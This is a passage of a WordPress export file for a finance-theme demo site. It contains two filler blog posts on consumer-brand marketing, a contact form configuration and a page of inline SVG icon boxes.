		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[440]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Crowdfunding. How to Get Funding Online?</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/crowdfunding-how-to-get-funding-online/</link>
		<pubDate>Sun, 04 Mar 2018 09:07:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=444</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>444</wp:post_id>
		<wp:post_date><![CDATA[2018-03-04 09:07:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-03-04 09:07:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[crowdfunding-how-to-get-funding-online]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contactless Payments’ Time Has Come</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/contactless-payments-time-has-come/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=447</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21;font-weight: 600">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21;font-weight: 600">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center;line-height: 36px">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>447</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:09:22]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:09:22]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[contactless-payments-time-has-come]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[448]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=610</link>
		<pubDate>Wed, 09 Sep 2020 03:52:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=610</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz 
support@oceanthemes.net
From: [your-name] 
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz 
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>610</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:52:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:52:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="cs-form flex-middle">
[email* your-email placeholder "Your Email *"]<button class="octf-btn">Sign Up</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/elements__trashed/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=624</guid>
		<description></description>
		<content:encoded><![CDATA[<h4>Icon Boxes</h4>		
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 